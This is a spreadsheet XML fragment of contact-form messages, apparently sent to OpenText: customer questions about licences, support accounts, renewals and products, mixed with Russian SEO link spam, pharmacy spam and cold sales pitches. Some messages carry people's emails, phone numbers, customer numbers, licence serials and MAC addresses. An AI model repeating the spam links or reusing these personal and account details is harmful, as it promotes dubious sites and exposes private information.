    <t>Наша фирма Контроль проект реализует сервис строительство бань.Применяем в возведенье, проектирование, оформление домов такие виды строительно-монтажных как: газобетон. _x000D_
 _x000D_
Наша компания Контроль проект с ориентируют вас и помогут вам сделать резонный выбор не только в сопровождении  но и в выборе стройматериалов для аудите многоквартирных домов, коттеджей. Изначальнонужно какой материал вы примете на вооружени для танхаусов, дачных домов ведь от выполнения этих функций зависит срок его применению в целом. _x000D_
 _x000D_
Наши подготовленные сотрудники  квалифицированные сориентируют вам всё правильно сотворить ваш выбор по проектированию многоквартирных коттеджей, домов, дачных домов. _x000D_
 _x000D_
Мы находимся в г.Самара и работа ведется по всей стране и за пределами страны. Обращайтесь к нам, и мы вам обязательно поможем! _x000D_
 _x000D_
строительство бань в самаре: [url=https://construction.contrpro.ru/construction/stroitelstvo-bani/]бани проекты строительство[/url]</t>
  </si>
  <si>
    <t>We would like to interview students who are completing the Business Process Suite training ( Cordys) for our organisation. Or is it possible to share details of few students who have completed and looking for jobs.</t>
  </si>
  <si>
    <t>Need to get training for my team basic and advance  of Business process suite</t>
  </si>
  <si>
    <t>​​​​​​​Dear Sir or Madam,_x000D_
_x000D_
_x000D_
I would like to introduce myself, Tomas Icso,Marketing Manager for the Hellraisers.pro (http://hellraisers.pro),one of the largest international eSports _x000D_
organisations world-wide since its inception in 2014,and is the home of some of the most successful pro-gaming team in title CounterStrike : GO._x000D_
_x000D_
_x000D_
Helllraisers‘s is one of  the largest and most recognisable eSports brand and a global leader in competitive gaming.Hellraisers  e-sport association would like to present you ourself and introduce you in esports.Our structure have aim in electronic sport, or e-sport evolve on several games,under which our players and organisation represent us,our partners &amp; sponsors,their brand,their products &amp; news._x000D_
_x000D_
ESports is big business today, and it’s only just begun.The eSports ecosystem, a $278 million industry, could surpass $1 billion as early as 2018 and there are over 205 million eSports fans globally and that number could grow to over 335 million by 2017.Companyes investing to become part of strong multinational gaming project in a growing e-sport market and the huge young audience in this market._x000D_
_x000D_
We would be very interested to cooperation with your brand. We can guarantee a dynamic promotions and commercial actions with a quality.As we aim to offer the best marketing cooperation,at this point we would like to present you a Partnership Proposal._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We look forward to seeing you soon !_x000D_
_x000D_
Best Regards,_x000D_
Tomas Icso​​​</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
I am contacting you to see If you would be interested in being part of a  tech group that we are creating in order to float together in the stock market. There are tons of benefits._x000D_
 _x000D_
We are basically setting up an agglomeration. This is a group of companies that still remain independent. There are lots of advantages from this approach such as floating on the stock market, reducing costs etc._x000D_
 _x000D_
You can watch the following video to get an idea of what we are setting up. (This is just an example for the marketing industry to give you an idea) https://www.youtube.com/watch?v=9BFbBnPnRHg_x000D_
 _x000D_
It would be great If you could have a quick an informal chat with Tony Messer, our CEO about this. If you would like to chat to him you can book a time at https://tony-messer-pickaweb.youcanbook.me_x000D_
 _x000D_
Also watch - Winter Summit 2017 after being in a PLC for a year. This is an example of a successful agglomeration https://www.youtube.com/watch?v=lqJVOr3WmcM _x000D_
 _x000D_
All the best_x000D_
 _x000D_
Pilar Torres Wahlberg_x000D_
co-founder_x000D_
www.pickaweb.co.uk_x000D_
https://www.linkedin.com/in/pilartorresw/</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I worked for Lectra and I replace a coworked that I left the company last year. the name of the coworker is Christian HIRIGOYEN. We renew the support, but with my account I don't have access to licence._x000D_
what I have is license for 6.2 and would like to upgrade to 6.3_x000D_
Serial Number 6.2		_x000D_
0E0325F2-627F0C4B-A4E9ED00-95FABEFC	?	10907049_x000D_
E46C2EFA-8DB399CC-16426796-288DEAD0	?	10907528_x000D_
CAAB9F2C-F385D791-2E83D9D8-698F73F1	?	10907529_x000D_
D01FA18E-B1C445CE-7034F44D-2BBEF196	?	10907048_x000D_
</t>
  </si>
  <si>
    <t>please stop sending us faxes though our phonenumber.</t>
  </si>
  <si>
    <t xml:space="preserve">I can not get 2 license keys from your support (OTCS Ticket   3386361). They say that we do not have a support contract. _x000D_
We bought 20 licenses for Brava Desktop DXP Build/Package 7.2.0.172 in April 2015. We still have 2 unused licenses. Why do we need support for something we've already buy? _x000D_
In last 3 years there was no problem with getting licenses from your support (tickets: 2884105, 2934010, 3042177)._x000D_
Please, help. We need this two keys ASAP._x000D_
Regards, Peter </t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag,_x000D_
wir sind ein IT Systemhaus in Ulm und bieten unseren Kunden u.a. auch SAP Hosting. Für eine konkreten Fall, suchen wir einen geeigneten Partner zur Betreuung eines IXOS Archivs - das in unserem ReZe gehostet werden soll._x000D_
Freue mich auf Ihre Antwort und verbleibe_x000D_
mit freundlichen Grüßen_x000D_
Joachim Ambrosius_x000D_
</t>
  </si>
  <si>
    <t>Hello, may I know if your CAD viewer supports window 2000 32bits ?_x000D_
May I know if the price 65$ is a year license or life time?_x000D_
_x000D_
Thanks_x000D_
Jr</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs, I've been using Open Text Enterprise Connect in my previous company as data management system for the legal department. Currently I need to introduce such or similar system for my new employer. Would you be able to present me an offer? </t>
  </si>
  <si>
    <t>Hello, I'm interesting in selling your solution in Côte d'Ivoire. My name is Fawaz Bouraima and i have a big experience in ECM.</t>
  </si>
  <si>
    <t>Hi,_x000D_
   We are currently running TDE 4.4.1(Data Integrator) on z/OS and would like to upgrade it to the latest version. Could you kindly assist us regarding this? Thanks.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I recommended Brava Desktop to my client and they would like to get 3 licenses of  	Brava! Desktop CXL through me. Do you provide reseller prices so I can fulfill my client's order?</t>
  </si>
  <si>
    <t>Если вы мечтаете о том, чтобы ваш загородный дом был комфортным и уютным, доставайте инструменты, закупайте материалы и сделайте, наконец, капитальный ремонт, подробнее читайте на сайте [url=http://akro-spb.ru]akro-spb.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi,_x000D_
_x000D_
I have noticed that your company is exhibiting HIMSS Annual Conference and Exhibition 2018 . I wanted to find out if you are looking for HIMSS Annual Conference and Exhibition 2018 attendees list to drive traffic to your booth and capture qualified leads._x000D_
_x000D_
Our HIMSS Annual Conference and Exhibition 2018 attendees list can help you to create a focused outreach to key decision makers and improve your campaign response rate as well as conversion._x000D_
_x000D_
Our list comes with Company Name, Website Address, Physical Address, Contact Name, Title, Phone number, Fax number, SIC Code, Industry Vertical, Revenue Size, Employee size and verified business Email Address._x000D_
_x000D_
Let me know if you are interested._x000D_
_x000D_
Regards,_x000D_
Carla Smith| Business2prospect_x000D_
302-789-0416_x000D_
www.business2prospect.com_x000D_
_x000D_
_x000D_
If you don't want to include yourself in our mailing list, please reply back "No thanks" in a subject line_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am a customer of Infor M3, and I am unable to access Streamserve support site to download hotfixes for Streamserve. can you please check why?_x000D_
_x000D_
account id: a.awlaqi@saudidiesel.com.sa_x000D_
_x000D_
Best Regards</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;i&gt;Купить шведскую стенку, детский спортивный  &lt;/i&gt;.&lt;br&gt; Шведская стегка Platsep Pro-2 в Омске -     Профессиональная серия. Технические характеристики:Турник - ширина хвата 105 см. Профиль вертикальных стоек - 6х4 мс. Ширина - 71 см. Расстояние между стойками - 63 см. Расстояние между осями брусьлев - 54 см. Высота - 240см. Максимальная нагрузка 250 кг   /goods/shvedskaya_stenka_plastep_preo_2/ &lt;br&gt;  _x000D_
 [URL=http://shved-stenki.ru/shvedskaya-stenka-v-grodno-v-magazine-na-vrublevskogo/]Шведская стенка в гродно в магазине на врублевского[/URL] [URL=http://shved-stenki.ru/detskij-sad-120-perm-oficialnyj-sajt-bassejn/]Детский сад 120 пермь официальный сайт бассейн[/URL]  _x000D_
 &lt;strong&gt;Ашан детские товары каталог - БэбиБлог&lt;/strong&gt;.&lt;br&gt; &lt;i&gt;ШведскаястенкаЭКТААтлетический цена,  &lt;/i&gt;.&lt;br&gt;  _x000D_
купить навесное на шведскую стенку _x000D_
 _x000D_
 &lt;i&gt;Шведские стенки -  &lt;/i&gt;.&lt;br&gt; &lt;strong&gt;Шведские стенки &lt;/strong&gt;.&lt;br&gt;  _x000D_
  [URL=http://shved-stenki.ru/shvedskaya-stenka-dlya-detej-v-kvartiru-romana-cheboksary/]Шведская стенка для детей в квартиру романа чебоксары[/URL] [URL=http://shved-stenki.ru/shvedskaya-stenka-chempion-ladas/]Шведская стенка чемпион ладас[/URL]  _x000D_
 &lt;u&gt;КупитьШведскаястенкастурникоми брсьями  &lt;/u&gt;.&lt;br&gt; Шведская стенкадляребенка 3лет  Девочки, нужны отзывы и рекомендации о шведских стенкахдляребенка 3лет(девочка). Девочка активная, с удовольствием лазит везде, висит на турнике, решили дома поставить стенку такую.  /blogs/post/443905448-142165391/ &lt;br&gt;  _x000D_
зарядка на шведской стенке для ребенка 7 лет _x000D_
 _x000D_
Отзывыиногородних покупателей.  СЁМАДетский   С оплатойидоставкой не было проблем. Спасибозанашу стенку. Цена, качество,сервисвсе супер! Евгекния Буторина из Кировской области  года Хочу выразить огромную благодарность Анастасиизастенку "Атлет"!  /topic-105528056_33302120 &lt;br&gt; &lt;u&gt;Купить настенныеипотолочныетурникидлядома-  &lt;/u&gt;.&lt;br&gt;  _x000D_
[URL=http://sport-shved-turnik.tk/detskij-sportivnyj-kompleks-v-raspor-v-kvartiru/]Детсикй спортивный комплекс в распор в квартиру[/URL] [URL</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from Hyssop Consulting_x000D_
Hyssop is a marketing consultancy agency who brings business from other countries into Malaysia, Singapore (SEA) and Vice Versa. We help you as a catalyst and appoint distribution channels, marketing personnel, setting up regional office, building factories, etc._x000D_
 _x000D_
We act on behalf of your company and work for you as your partners for South East Asia. We are looking for companies who are interested in expanding their business in South East Asia._x000D_
We work on various business models, yearly contracts, monthly retainer and/or adhoc basis._x000D_
 _x000D_
Please visit our website www.hyssopconsulting.com_x000D_
 _x000D_
For more details please email us to info@hyssopconsulting.com_x000D_
 _x000D_
Our Skype id: hyssopconsulting_x000D_
 _x000D_
Thank You   _x000D_
 _x000D_
Best Regards,_x000D_
 _x000D_
Hyssop Consulting_x000D_
 _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Hi I would like to check if there's any fees for attending this event?</t>
  </si>
  <si>
    <t>Сегодня сложно встретить семью, в которой не было бы автомобиля. Городские дороги переполнены машинами различных марок.Из-за невнимательности, а иногда и не опытности водителей происходят аварии на дорогах, в результате которых получают травмы как водители, так и пешеходы, подробнее читайте на сайте [url=http://dumainfo.ru]dumainfo.ru[/url]</t>
  </si>
  <si>
    <t>Распространение мха на мягкой черепице – одна из наиболее распространенных проблем данного вида покрытий. Несмотря на то что мох часто досаждает и на других видах кровли, именно на мягкой черепице он является одной из основных проблем, проявляющихся практически при любом расположении дома на северной стороне ската. Читайте об этом подробнее на сайте [url=http://roofor.ru]roofor.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Cialis Et Maux De Tete Cheap Eurovan Zopiclone Acheter Clomid En Ligne Territoires Du Nord Ouest  [url=http://cialiviag.com]cialis[/url] Zithromax Erythromycin  </t>
  </si>
  <si>
    <t xml:space="preserve">Does RightFax v16.2 support the Ricoh ESA embedded?  The Web site lists support for v10.6 FP3 but not v16.x. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I’m writing you to share my idea. You can increase your business revenue by dealing with Decision Makers in Finance &amp; Banking sector.  We maintain recently updated contacts with email addresses across USA, Canada, UK, Australia  and rest of the Countries. _x000D_
Data fields: First Name, Last Name, Job Title, Email Address, Company Name, Address, City, State/Province, ZIP/Postal Code, Country, Phone, Fax and Web Address. _x000D_
Lists we maintain: CEO, CFO, HR, IT Senior Titles, Sales Directors, etc._x000D_
These lists will be delivered for your perpetual use at one-time cost.  List can be used for promoting your companies or get your clients for business development._x000D_
_x000D_
Awaiting for a response from you._x000D_
Have a nice day!_x000D_
_x000D_
Thanks &amp; Regards,_x000D_
William Adams,_x000D_
Business Development Executive_x000D_
+1 609-414-7371_x000D_
ContactB2BList/Updated Contacts_x000D_
To opt out reply with 'Unsubscribe' in the subject line._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We utilize Liquid Office, and have for over a decade.  We have never utilized it even close to what it's full potential looks to be.  Truly more for forms, and a few workflow processes._x000D_
Was wondering if there are any plans for online courses to cover the Process side of LO, or materials to train with?_x000D_
_x000D_
Thanks,_x000D_
Jon</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to verify the dates of employment and job title for a former employee as part of a pre-employment background screening. Can you please direct me to the correct point of contact to verify past employment? In order to respect the privacy of the candidate, since this is a general mailbox, I do not want to disclose her information. I can provide additional information and details to the correct individual. </t>
  </si>
  <si>
    <t>I'd like to obtain a usage comparison for 2016 compared to 2017 to determine our growth (shrinkage) in our electronic document utilization.  My customer number is 101835 and my contract is 40002753.  If this is something I can review on-line my apologies, I just need directions to how to review this._x000D_
Thanks for your attention to this... Randy</t>
  </si>
  <si>
    <t>BPA Contract 76776.  We have noticed that we have not been invoiced for items 6 &amp; 7 in the contract.  Can you please let us k now when we will receive this invoice?</t>
  </si>
  <si>
    <t>We are in the process of create a vendor in our system for Petro Canada Lubes._x000D_
I am wondering why the address on your W-9 does not match what your physical address is. It looks like your company is using the bank address on the W-9. _x000D_
Your assistance with this matter is greatly appreciated._x000D_
LaTonya Office</t>
  </si>
  <si>
    <t xml:space="preserve">I have a customer using OpenText EDI for their JD Edwards and they are looking at putting some divisions in the Oracle Cloud and wanted to know if your EDI would work with Oracle Cloud.  </t>
  </si>
  <si>
    <t xml:space="preserve">What is the process for closing our account?  Our customer number is: 128002583897._x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>I am unable to edit and repurpose a fax number for a new employee.</t>
  </si>
  <si>
    <t>I'd like to get registered for a My Support Account.</t>
  </si>
  <si>
    <t>I am an SAIC employee working on an IRS contract. I believe that both SAIC and IRS have support contracts and I need my account upgraded to allow me to view technical support topics and be able to open new tickets. _x000D_
Thanks</t>
  </si>
  <si>
    <t>Hello, good evening._x000D_
_x000D_
I work at Petrobras, a Brazilian oil and gas company that has a branch in the Netherlands, in Rotterdam. We are currently developing a project to improve our document management processes, and one of our partners recommended your company._x000D_
_x000D_
I'd like to know if it is possible to set up a meeting with your team in Rotterdam (as I've seen in your website, our office is very close to yours), so we can discuss our needs and you can make an initial presentation of your products / services. Would that be possible?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Julia Salzedas_x000D_
Finance / Petrobras Netherlands B.V.</t>
  </si>
  <si>
    <t>We are currently in the process of searching for a software solution to assist us with tracking public records requests.  We would like to speak with someone in your organization about the products that you offer in this area._x000D_
_x000D_
Please give me a call when you get a chance so that we can discuss our needs._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Stasi Chase, J.D._x000D_
Information Practices _x000D_
Policy and Records Administration_x000D_
University of California, San Diego_x000D_
(858) 534-3394</t>
  </si>
  <si>
    <t>I would like to speak to someone about Documentum. We are looking to become a paperless office.  I would like to speak to someone and also see a demo.  Thank you.</t>
  </si>
  <si>
    <t>We bring ideas to life.  We are a Southern California based company that provides sales and rental solutions for expos and trade shows.  Please visit our website exhibitfactory.com or call us at 888 342 4463 for ideas for your booth at the Design Automation Conference San Francisco 6/24-6/28.  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Brava!® Desktop v7.2 license PIN 382781_x000D_
_x000D_
I am upgrading my laptop again and wish to transfer the software to my new laptop._x000D_
_x000D_
Docking station mac address: A4-4C-C8-9D-E5-99_x000D_
_x000D_
The LAN mac address is: 8C-EC-4B-DF-7C-FA_x000D_
_x000D_
WIFI mac address is: 40-A3-CC-DF-B2-40_x000D_
_x000D_
Could I please ask for a new licence file. _x000D_
</t>
  </si>
  <si>
    <t>I need to know the compatibility between Opentext and several storage array. maybe Scality or SUSE enterprise Storage or Redhat Gluster, or HPE 3PAR, Nimble</t>
  </si>
  <si>
    <t xml:space="preserve">Готовые Системы видеонаблюдения в магазин, запись круглосуточная со звуком. установка дополнительных микрофонов _x000D_
 _x000D_
[url=http://www.video-stb.ru/catalog/magnitnye-zamki/]установка электромагнитного замка[/url]_x000D_
[url=http://www.video-stb.ru/catalog/magnitnye-zamki/]установка магнитного замка в офис[/url]_x000D_
 _x000D_
&lt;a href=http://www.video-stb.ru/catalog/vrezka-zamkov/&gt;врезка замка в металлическую дверь&lt;/a&gt;_x000D_
&lt;a href=http://www.video-stb.ru/catalog/elektromekhanicheskie-zamki/&gt;монтаж электромеханического замка&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to purchase/upgrade your software. Is your software compatible with Windows 10? Is this on premises or cloud? </t>
  </si>
  <si>
    <t>I got the link https://knowledge.opentext.com/knowledge/piroot/_doclists/p-crm-basic.160300.xml from Thomas Endt (OpenText), but my account does not have sufficient rights? How can I request access to MySupport after Account creation?</t>
  </si>
  <si>
    <t>I'm a consultant from ITOne onshore in Banco Toyota which has Documentum and Captiva installed. So due to Documentum upgrade, we must have access to download the executable files and to issue tickets when necessary._x000D_
_x000D_
Internally I only have the name of the contact from my customer which was in charge to download files from EMC Support site:_x000D_
_x000D_
Luciano Santos_x000D_
luciano_santos@bancotoyota.com.br_x000D_
_x000D_
Please would you confirm if this is the key contact or can you send me the right name?_x000D_
Luciano is vacation right now and he also started the request to have the same abilty to have the same permissions I'm requesting too. But we already are behind the schedule and he allowed me to go forward with this process._x000D_
_x000D_
Thanks in advance_x000D_
Ranan Santana_x000D_
_x000D_
PS: As Enlish is not my native languange, please I do prefere the contact by email and if it's possible you can copy another consultant osni.ferreira@itone.com</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to know who to contact in regards to getting a quote/information for OpenText Content Server Mobile , licensing for use by the opentext clients/customers </t>
  </si>
  <si>
    <t>We are in the process of replacing or aging ERP (VAI) with Dynamics 365 for Operations. We need to replace our image capturing processes to use SharePoint as the repository and by using a web-based scanning tool. We would like to see pricing, and if pricing is within our range, we would like to see a demo. Thank you.</t>
  </si>
  <si>
    <t>Inquiry about upgrading from Free DWG viewer to paid version.</t>
  </si>
  <si>
    <t>Please send a W-9 to support our charge made with your company (payment  ref # AI1C76AD9709)_x000D_
_x000D_
thank you,</t>
  </si>
  <si>
    <t>I am interested in how to become a Technology Partner. I looked at the different partnership levels and the Technology Partner is perfect for us. Thanks</t>
  </si>
  <si>
    <t>Request information on upgrading our on premise RightFax server to cloud version.</t>
  </si>
  <si>
    <t>Por favor necesito contactarlos._x000D_
mi celular +51945068299</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have recently joined our company. Unfortunately, I cannot access our GXS Catalogue anymore. We have two logins OP084A and OP084B. Could you please advice ASAP._x000D_
_x000D_
Many thanks in advance!</t>
  </si>
  <si>
    <t>I do not longer have access to the Documentum contents (forum, documentation, ...)</t>
  </si>
  <si>
    <t>Vi behöver en faktura från er för att kunna betala våra opentext-licenser. Det räcker inte med en renewal som ni skickat oss. Kan ni sända oss en faktura?</t>
  </si>
  <si>
    <t>Captiva renewal/development</t>
  </si>
  <si>
    <t xml:space="preserve">considering cloud fax solutions.   currently on RightFax 10.6_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Website access not allowing to view any content related to ECM. Armedia LLC is a partner with Open Text. Can someone please review my account and access so I can do research and download products if needed. </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je souhaiterais contacter vos services, pourriez-vous me communiquer un numéro de téléphone valide afin que je puisse échanger avec vous svp? Le numéro figurant sur votre site ne fonctionnant pas._x000D_
Merci._x000D_
Cordialement.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are a financial services company that as part of a new customer account opening process, we accept from customers images (in the format of mostly jpg, png and PDF) of their credit cards, passport and similar. _x000D_
We need to store these files but we wish to blacken or remove from them any data that we don’t need and can be sensitive to the client (e.g. we need only the last 4 digits of a credit card number, not the whole of the number)._x000D_
Of course, we wish that this will be done as automatically and accurately as possible._x000D_
Can your product of "OpenText Redact-It Enterprise" do this?_x000D_
Thanks.</t>
  </si>
  <si>
    <t>I am interested in Documentum. I would like to see a demo .</t>
  </si>
  <si>
    <t>In order to gain experience</t>
  </si>
  <si>
    <t>Bom dia,_x000D_
Gostaria de saber o preço da Solução ECM da OpenText e se esta solução permite:_x000D_
Armazenamento de pareceres em PDF e WORD;_x000D_
Classificação e restrição de acesso ao conteúdo dos pareceres;_x000D_
Manuseio e controle de conteúdo por parte da perfis definidos_x000D_
Inserção de pareceres e classificação de conteúdo por parte de perfis definidos_x000D_
Consulta ao conteúdo do sistema por perfis definidos_x000D_
Subsidiariamente, encaminhamento de pareceres para departamentos demandantes digitalmente, inclusive utilizando de assinatura digital ou de senha específica._x000D_
Grato.</t>
  </si>
  <si>
    <t>Hello, we do use VIM in other countries and would like to analyze if could be used in Brazil as well due to nota fiscal, extra fields, taxes etc. thank you, Alejandro</t>
  </si>
  <si>
    <t>Customer needs Brava functionality</t>
  </si>
  <si>
    <t>buy the software directly and we have team to implement it. don't forward me to http://www.squareonemea.com because their prices is too high.</t>
  </si>
  <si>
    <t xml:space="preserve">We are training institute and looking for DRM Solutions. Usually we give printed materials for the students but we are now planning to give tablets with PDF/Word documents loaded. We need to implement DRM solutions so that our books will not be redistributed, copied, printed etc by the students. Do you have any product to fulfill this requirement? Note our students will be using materials in tablets_x000D_
_x000D_
Please let me know the pricing and license </t>
  </si>
  <si>
    <t>Hello_x000D_
I am trying to download the Free version of brava reader, but i am not receiving any emails from you. Mails are not going to spam either._x000D_
Any ideas?_x000D_
_x000D_
John</t>
  </si>
  <si>
    <t>Hi, our firm is interested in SAP platform OpenText ECM Suite for SAP Solutions. Our SAP platform is not the latest version but does this suite works with any version/type of SAP platform? Or do we need to upgrade our SAP system to Hana/Cloud? _x000D_
_x000D_
Thanks in advance for your help._x000D_
_x000D_
Kind regards,_x000D_
Ritsuko</t>
  </si>
  <si>
    <t>Girls</t>
  </si>
  <si>
    <t>Quatation Required  For (2 License )_x000D_
Brava! Desktop that supports Tiff, PDF, EPS, JPEG, MySids. View and Print, Redact, Compare, Measure, Takeoff, Publish and Annotate. Includes 1 year Maintenance</t>
  </si>
  <si>
    <t>Hi there,_x000D_
We're about to migrate from Documentum 6.7 to Documentum 7.3. _x000D_
That includes migration of user access to software. I was never really migrated from EMC/Dell to OpenText so my colleague Finn Kvist Hansen created my account as an administrator. As first thing I changed my email (he used our official company long-email peter.ingemann@stab.rm.dk, I prefer our shorter one - peehas@rm.dk - both mails points to my inbox). _x000D_
But somehow my opentext account is now broken. I cannot even seem to reset my password anymore. _x000D_
So can you please fix my account and make it administrator for the Region Midtjylland domain._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
Peter Ingemann Hansen,</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
I am currently working alongside with few o the leading experts in the industry on a project called the the ‘7th Edition BIG CIO SHOW &amp; AWARDS’ which is scheduled to take place in Mumbai (India) on the 15th-16th March, 2018,  Our partners include the likes of Leading Associations, Top-notch firms &amp; the biggest solution providers._x000D_
_x000D_
_x000D_
I am getting in touch with you all today, to understand if  ‘Open Text Corp.‘ would like to take up an active role in being one of the prime solution providers at this high profile gathering. _x000D_
_x000D_
Please do let me know, as to whom I can take this up with. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have tried sending emails to 'ECD-SupportRenewals@opentext.com' several times but seems that nobody is interested in replying to my email._x000D_
Below is the copy of my email._x000D_
_x000D_
Our Pixtools Support will be expiring in few months and would like to renew the same._x000D_
_x000D_
I would appreciate if you could arrange to send us your quote for the renewal of the same for a period of 1 year._x000D_
_x000D_
Also, kindly provide all information related to the payment procedure._x000D_
_x000D_
Attaching the quote that was from EMC for the year 2016 to 2018, which was renewed for your information._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Roni M. Mathew, PMP, SSGB_x000D_
Diwan Amiri | IT Infrastructure Section_x000D_
P.O.Box 923 | Doha, Qatar._x000D_
D: +974 44388138 | EFax: +974 44100038_x000D_
roni/at/diwan.gov.qa | http://www.diwan.gov.qa_x000D_
Business Hours: Sunday to Thursday 7:00 A.M to 2:00 P.M GMT+3_x000D_
</t>
  </si>
  <si>
    <t>renewal</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from Hyssop Consulting_x000D_
Hyssop is a marketing consultancy agency who brings business from other countries into Malaysia, Singapore (SEA) and Vice Versa. We help you as a catalyst and appoint distribution channels, marketing personnel, setting up regional office, building factories, etc._x000D_
_x000D_
We act on behalf of your company and work for you as your partners for South East Asia. We are looking for companies who are interested in expanding their business in South East Asia._x000D_
We work on various business models, yearly contracts, monthly retainer and/or adhoc basis._x000D_
_x000D_
Please visit our website www.hyssopconsulting.com_x000D_
_x000D_
For more details please email us to info@hyssopconsulting.com_x000D_
_x000D_
Our Skype id: hyssopconsulting_x000D_
_x000D_
Thank You   _x000D_
_x000D_
Best Regards,_x000D_
Raji_x000D_
Hyssop Consulting _x000D_
</t>
  </si>
  <si>
    <t>Kai Team,_x000D_
I am Abhishek Singh from Delhi NCR, I will have the best deal proposal for CSR NGO for your organization. Please share your details, so I will send you the proposal with special rates.</t>
  </si>
  <si>
    <t>NLP and auto-categorization</t>
  </si>
  <si>
    <t>I'm driving a strategy to replacement a major legacy DAM at the Cirque. I'm having a hard time understanding your DAM offering and capabilities from your web site ... such as integration with Salesforce, Sitecore, SharePoint, social media, AI, ... among others. Please respect that I'm in discovery mode for vendor candidates and not at the selection stage. I'm fact based and need from you a commitment on capabilities and the product list price cost model (hopefully easy to understand). Transparency &amp; accurate info is paramount at this stage to build a trust relationship. Cheers! Mario</t>
  </si>
  <si>
    <t xml:space="preserve">I work for WIRB Copernicus Group and am leading a project to move from Documentum 5.3 to 7.3.  The original implementation was with WIRB (Western Independent Review Board), based in Puyallup, WA and is still being used today.  I would like to understand our current licensing and to make sure we have what we need to support the installation and implementation of Document 7.3.  We are working with a vendor to assist with the configuration of 7.3 and the migration of documents out of 5.3.  This is a high priority project for us and I would like to treat this discussion with high priority._x000D_
_x000D_
I look forward to speaking with you about this at your earliest convenience._x000D_
_x000D_
Thanks,_x000D_
Chris_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren._x000D_
_x000D_
wir haben mehrere OFTP / EDI Verbindungen zu LEAR über Ihren Dienst. Wir sprechen hier noch über ISDN Die SSID: O0031330GXS33145595MSEMEA an._x000D_
Unsere ID lautet: O0013008671MERSCHB_x000D_
Gerne würde ich auf TCP/IP umstellen._x000D_
Können Sie mir hier weiterhelfen?_x000D_
Vielen Dank!_x000D_
_x000D_
Mit freundlichen Grüßen / Best regards_x000D_
 _x000D_
i.A. Simon Manigel_x000D_
_x000D_
 _x000D_
  _x000D_
_x000D_
Titanweg 5_x000D_
33415 Verl_x000D_
Tel.: +49 / 5246 / 93593-41_x000D_
Fax: +49 / 5246 / 93593-42_x000D_
E-Mail: s.manigel@merschbrock.de_x000D_
_x000D_
Merschbrock Kunststoff Spritzguss GmbH _x000D_
_x000D_
Geschäftsführer: Wilhelm Merschbrock, Uwe Merschbrock  :  Amtsgericht Gütersloh HRB 2802  :  Ust-IdNr. DE 813 783 125_x000D_
Sitz der Gesellschaft  :  Titanweg 5, 33415 Verl   :  Internet:    www.merschbrock.de  :  E-Mail:      info@merschbrock.de_x000D_
Tel.: +49 (0)5246 / 93593-0  :  Fax.: +49 (0)5246 / 93593-33_x000D_
</t>
  </si>
  <si>
    <t>I installed the latest version of the free Brava reader and now I can no longer associate .tif and .tiff files with Brava. I can open them if I go through brava, but I can't even select brava as an option for the default. Even attempting to link it to the .exe doesn't work.</t>
  </si>
  <si>
    <t>Need to contract for the service that allows us to send workers' compensation claims to the State of Connecticut and receive ack files from the state. This is really just an electronic mailbox and we don't need anything else other than to move (ftp?) our files to a mailbox and pick up acknowledgment files from Connecticut from the mailbox. Sorry, don't know the name of the product, but hopefully I have given you enough information to identify what we need.</t>
  </si>
  <si>
    <t>I'd like to discuss about a potential opportunity for partnership</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
bitte kontaktieren Sie mich bezüglich einer Online-Präsentation. Wir sind derzeit auf der Suche nach einer Omni-Channel-Lösung zur Schulderkommunikation._x000D_
_x000D_
Freundliche Grüße _x000D_
Daniel Markgraf</t>
  </si>
  <si>
    <t>Using VIM as an AP solution.  Want to uncover whether the solution offers any opportunities to support automation of European VAT TAX code automation, how, and what other customers have had success using VIM to do this.</t>
  </si>
  <si>
    <t>To Whom it May Concern,_x000D_
_x000D_
My name is Komal and I'm the VP. Social of the Undergraduate English Students Association and I was wondering if you would be interested in donating a prize to raffle at our annual Yule Ball._x000D_
_x000D_
A little background on us - the UESA is a uOttawa student fed body dedicated to bringing English Literature students the best, most involved university experience we can. _x000D_
_x000D_
Yule Ball is our formal event hosted annually and encourages community within the department and between English Lit students and students from other faculties. It's a memorable night of food, dancing, and, of course, some Harry-Potter themed magic._x000D_
_x000D_
As fits a gala-style event, we like to raffle off some items for our guests. It also becomes an opportunity for businesses around the university to promote themselves and begin potential partnerships with the UESA that could continue for 101week or any of our monthly philanthropic initiatives (a one-time donation is all we ask for, though). In return for a donation, we provide advertising space on our website, as well as social media shout-outs._x000D_
_x000D_
Yule Ball takes place on February 3rd, and I would be able to come pick up any donation from your location any evening or weekend up until the event._x000D_
_x000D_
Thank you for your consideration, I look forward to your potential sponsorship! Please let me know if you have any questions. _x000D_
